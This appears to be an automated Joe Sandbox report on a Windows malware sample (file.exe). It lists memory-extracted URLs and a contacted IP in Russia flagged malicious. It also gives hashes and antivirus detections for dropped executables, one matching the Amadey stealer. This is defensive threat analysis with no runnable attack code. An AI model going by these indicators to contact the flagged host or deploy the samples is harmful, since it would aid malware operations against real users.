                                                http://tempuri.org/Entity/Id7bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://tempuri.org/Entity/Id6bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecretbvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://tempuri.org/Entity/Id19Responsebvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003466000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#licensebvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issuebvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://schemas.xmlsoap.org/ws/2004/10/wsat/Abortedbvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequencebvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://schemas.xmlsoap.org/ws/2004/10/wsat/faultbvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://schemas.xmlsoap.org/ws/2004/10/wsatbvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeybvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://tempuri.org/Entity/Id15Responsebvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.000000000355E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namebvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renewbvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://schemas.xmlsoap.org/ws/2004/10/wscoor/Registerbvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://tempuri.org/Entity/Id6Responsebvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003466000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKeybvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://api.ip.sb/ipfaC80kI.exe, 00000002.00000003.306466167.000000000442E000.00000004.00000020.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000000.331124097.0000000000D72000.00000002.00000001.01000000.00000009.sdmp, bvr38xq.exe.2.drfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        http://schemas.xmlsoap.org/ws/2004/04/scbvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PCbvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancelbvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://tempuri.org/Entity/Id9Responsebvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003466000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=bvr38xq.exe, 00000004.00000002.401601537.000000000418C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://tempuri.org/Entity/Id20bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                http://tempuri.org/Entity/Id21bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                http://tempuri.org/Entity/Id22bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003466000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issuebvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://tempuri.org/Entity/Id1Responsebvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=bvr38xq.exe, 00000004.00000002.401601537.000000000416F000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.000000000420A000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.00000000043F1000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.0000000004288000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.00000000032B4000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.00000000041ED000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003228000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003459000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.00000000042E9000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.0000000004383000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.0000000004306000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.000000000426B000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003340000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.00000000033CC000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.0000000004366000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.000000000418C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://go.micatn32.exe, 00000003.00000002.330597365.00000000006F4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequestedbvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnlybvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://schemas.xmlsoap.org/ws/2004/10/wsat/Replaybvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnegobvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binarybvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PCbvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKeybvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://schemas.xmlsoap.org/ws/2004/08/addressingbvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issuebvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://schemas.xmlsoap.org/ws/2004/10/wsat/Completionbvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://schemas.xmlsoap.org/ws/2004/04/trustbvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://tempuri.org/Entity/Id10bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              unknown
                                                                                                              http://tempuri.org/Entity/Id11bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              unknown
                                                                                                              http://tempuri.org/Entity/Id12bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              unknown
                                                                                                              http://tempuri.org/Entity/Id16Responsebvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003466000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              unknown
                                                                                                              http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponsebvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancelbvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://tempuri.org/Entity/Id13bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  unknown
                                                                                                                  http://tempuri.org/Entity/Id14bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  unknown
                                                                                                                  http://tempuri.org/Entity/Id15bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  unknown
                                                                                                                  http://tempuri.org/Entity/Id16bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  unknown
                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/Noncebvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://tempuri.org/Entity/Id17bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    http://tempuri.org/Entity/Id18bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    http://tempuri.org/Entity/Id5Responsebvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    http://tempuri.org/Entity/Id19bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dnsbvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://tempuri.org/Entity/Id10Responsebvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003466000.00000004.00000800.00020000.00000000.sdmpfalse
IP | Domain | Country | ASN | ASN Name | Malicious
193.233.20.11 | unknown | Russian Federation | 8749 | REDCOM-ASRedcomKhabarovskRussiaRU | true
                                                                                                                                                          Joe Sandbox Version:36.0.0 Rainbow Opal
                                                                                                                                                          Analysis ID:803862
                                                                                                                                                          Start date and time:2023-02-10 11:37:07 +01:00
                                                                                                                                                          Joe Sandbox Product:CloudBasic
                                                                                                                                                          Overall analysis duration:0h 8m 29s
                                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                                          Report type:full
                                                                                                                                                          Cookbook file name:default.jbs
                                                                                                                                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:13
                                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                                          Number of injected processes analysed:0
                                                                                                                                                          Technologies:
                                                                                                                                                          • HCA enabled
                                                                                                                                                          • EGA enabled
                                                                                                                                                          • HDC enabled
                                                                                                                                                          • AMSI enabled
                                                                                                                                                          Analysis Mode:default
                                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                                          Sample file name:file.exe
                                                                                                                                                          Detection:MAL
                                                                                                                                                          Classification:mal100.troj.spyw.evad.winEXE@12/8@0/1
                                                                                                                                                          EGA Information:
                                                                                                                                                          • Successful, ratio: 80%
                                                                                                                                                          HDC Information:
                                                                                                                                                          • Successful, ratio: 100% (good quality ratio 95.8%)
                                                                                                                                                          • Quality average: 85.1%
                                                                                                                                                          • Quality standard deviation: 22.8%
                                                                                                                                                          HCA Information:
                                                                                                                                                          • Successful, ratio: 100%
                                                                                                                                                          • Number of executed functions: 185
                                                                                                                                                          • Number of non-executed functions: 97
                                                                                                                                                          Cookbook Comments:
                                                                                                                                                          • Found application associated with file extension: .exe
                                                                                                                                                          • Override analysis time to 240s for rundll32
                                                                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe
                                                                                                                                                          • Execution Graph export aborted for target bvr38xq.exe, PID 1240 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                                                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
11:38:41 | API Interceptor | 21x Sleep call for process: bvr38xq.exe modified
Match | Associated Sample Name / URL | Detection
193.233.20.11 | file.exe | malicious
                                                                                                                                                                                                  No context
Match | Associated Sample Name / URL | Detection | Context
REDCOM-ASRedcomKhabarovskRussiaRU | file.exe | malicious | 193.233.20.11
                                                                                                                                                                                                  No context
Match | Associated Sample Name / URL | Detection
C:\Users\user\AppData\Local\Temp\IXP000.TMP\doa18JW.exe | file.exe | malicious
C:\Users\user\AppData\Local\Temp\IXP000.TMP\doa18JW.exe | fl47EOJvPm.exe | malicious
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\IXP002.TMP\atn32.exe
                                                                                                                                                                                                                                          File Type:CSV text
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):226
                                                                                                                                                                                                                                          Entropy (8bit):5.354940450065058
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2wlAsDZiIv:Q3La/KDLI4MWuPTxAIv
                                                                                                                                                                                                                                          MD5:B10E37251C5B495643F331DB2EEC3394
                                                                                                                                                                                                                                          SHA1:25A5FFE4C2554C2B9A7C2794C9FE215998871193
                                                                                                                                                                                                                                          SHA-256:8A6B926C70F8DCFD915D68F167A1243B9DF7B9F642304F570CE584832D12102D
                                                                                                                                                                                                                                          SHA-512:296BC182515900934AA96E996FC48B565B7857801A07FEFA0D3D1E0C165981B266B084E344DB5B53041D1171F9C6708B4EE0D444906391C4FC073BCC23B92C37
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:high, very likely benign file
                                                                                                                                                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exe
                                                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):2843
                                                                                                                                                                                                                                          Entropy (8bit):5.3371553026862095
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:48:MxHKXeHKlEHU0YHKhQnouHIWUfHKhBHKdHKBfHK5AHKzvQTHmtHoxHImHKx1qHjW:iqXeqm00YqhQnouOqLqdqNq2qzcGtIxM
                                                                                                                                                                                                                                          MD5:E787CF7FE6F73C60B1ADCB6CFE9A2FAE
                                                                                                                                                                                                                                          SHA1:CF44D405D677875BC3AC3A41336DA6C8F3E58277
                                                                                                                                                                                                                                          SHA-256:6332B18367739773EAA1686C22A11DCEAD2D7314EBCEE5510F5E6A799A301203
                                                                                                                                                                                                                                          SHA-512:8C7213E33F6A56744FAED770ECC85BFC0F9DF1EA07249CFA6FDFD1EB0822F0ADD47BB072EE21CA6442D03A1E44FE2613BFC4FFC4B72B029F33AA292A390F023B
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:moderate, very likely benign file
                                                                                                                                                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\820a27781e8540ca263d835ec155f1a5\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\889128adc9a7c9370e5e293f65060164\PresentationFramework.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Wi
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):241664
                                                                                                                                                                                                                                          Entropy (8bit):6.368190069123744
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:6144:YS/OgTLnk2FBtze+1T9uA/qruVyhVYjgVO:dO3v+uA+uVyhVvO
                                                                                                                                                                                                                                          MD5:8BB923C4D81284DAEF7896E5682DF6C6
                                                                                                                                                                                                                                          SHA1:67E34A96B77E44B666C5479F540995BDEACF5DE2
                                                                                                                                                                                                                                          SHA-256:9B0410052289A8416A458401FBB9A74D6361F4769465431B209F32151D7C6F21
                                                                                                                                                                                                                                          SHA-512:2DAED03277A343DB5FCB22E26BAEA5CDA41DE39DC825FE0AAD51F6EC181B8F38F09427F27FB58FFD179F37032600D107EF772CC6275F7D0D62899C6CD3F8AFF7
                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                          Yara Hits:
• Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\doa18JW.exe, Author: Joe Security
                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 79%
• Antivirus: Virustotal, Detection: 82%
Joe Sandbox View:
• Filename: file.exe, Detection: malicious
• Filename: fl47EOJvPm.exe, Detection: malicious
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):610816
                                                                                                                                                                                                                                          Entropy (8bit):7.841750727123454
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:12288:FMrTy90K3cSojyVMuIMlexHMgRkNR+YkjR:aykShVXlezc2
                                                                                                                                                                                                                                          MD5:AC6FB170803555E15DA3A1BA13CBC6D3
                                                                                                                                                                                                                                          SHA1:66E210CB20912A8FB82CFBED0742541A41FCC25C
                                                                                                                                                                                                                                          SHA-256:D7339ECAC493636FE5B4AF1F418BFF9A21F355D74D814391B115C7FF05DFD9AC
                                                                                                                                                                                                                                          SHA-512:C868F9E2CBD8FC1C68CE2156A1B91A5C65A0E7722A380F2DC0194D113ACFF4192D76289CE6513E05B6A0E85A0FCB2803E716CC0BC40D4095775C2A8191B704F7
                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\fxV11fe.exe
                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):467456
                                                                                                                                                                                                                                          Entropy (8bit):6.774745957610931
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:6144:q0lu6aSHczn//H4D6HMbPFn21BxBdrnfWxj6T/:qVSGU6HM7RMBnfWY/
                                                                                                                                                                                                                                          MD5:38843698815444B78BB8A73CB2A55E1C
                                                                                                                                                                                                                                          SHA1:823D3BCA57C0EF79B64B736E0B856B15EB8A1427
                                                                                                                                                                                                                                          SHA-256:D08806D5EB85A075C3CA96312BC79DB64BE887550A4A66D9FAA89317AD9BEFF3
                                                                                                                                                                                                                                          SHA-512:86EC0F5BC0FED715B9E9298C6C75AC97FCA05E9CEE217F9452C50DC54EDA35C7099FA2CD751A501036068D1455632D86D5E33B126767626BAFD641E4B9D0B57F
                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                          • Antivirus: Virustotal, Detection: 32%, Browse
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\fxV11fe.exe
                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):206848
                                                                                                                                                                                                                                          Entropy (8bit):7.24372843243464
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3072:KZy+bnr+O1X5GWp1icKAArDZz4N9GhbkrNEk6jhl1Jw5D+QMpv1DQoT8njdlYj:KZy+bnr+kp0yN90QEhDwpopv1DQPnj4
                                                                                                                                                                                                                                          MD5:AFC0E8E01E2B88123841047710836075
                                                                                                                                                                                                                                          SHA1:3566BB517E62D0BC0FA0D222F57AFA8484B4C4BB
                                                                                                                                                                                                                                          SHA-256:0B770E8B3F94A5619F73D87065904A0AAC0B53C6AF95556E19F0C37A82C472BB
                                                                                                                                                                                                                                          SHA-512:D90F2CED0A2ED5F92B76CB95C0AEEA456247034D843958E253A1D2F0DE853A4E07D7C0237E4762802F1E1B73C8B637AC4445D9D16EC310EB483538BE0FDCE025
                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\IXP001.TMP\faC80kI.exe
                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):11264
                                                                                                                                                                                                                                          Entropy (8bit):4.97029807367379
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:96:yA/vMth9sDLibql3A44P9QL4fwmPImg+A03PvXLOzk+gqWYV4J6oP/zNt:yw+wGWt94+iANiCkc4Jhp
                                                                                                                                                                                                                                          MD5:7E93BACBBC33E6652E147E7FE07572A0
                                                                                                                                                                                                                                          SHA1:421A7167DA01C8DA4DC4D5234CA3DD84E319E762
                                                                                                                                                                                                                                          SHA-256:850CD190AAEEBCF1505674D97F51756F325E650320EAF76785D954223A9BEE38
                                                                                                                                                                                                                                          SHA-512:250169D7B6FCEBFF400BE89EDAE8340F14130CED70C340BA9DA9F225F62B52B35F6645BFB510962EFB866F988688CB42392561D3E6B72194BC89D310EA43AA91
                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 85%
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\IXP001.TMP\faC80kI.exe
                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):179200
                                                                                                                                                                                                                                          Entropy (8bit):4.951529552333406
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:3072:OxqZWXragQx+/pnab8PeR5D+hb/xNn2pU9f2MKTV/wi4lr55R9TxlnsPsUw0jOuD:0qZWpnaQC+h
                                                                                                                                                                                                                                          MD5:EF8079CF160510D0DA7162BC08F753D8
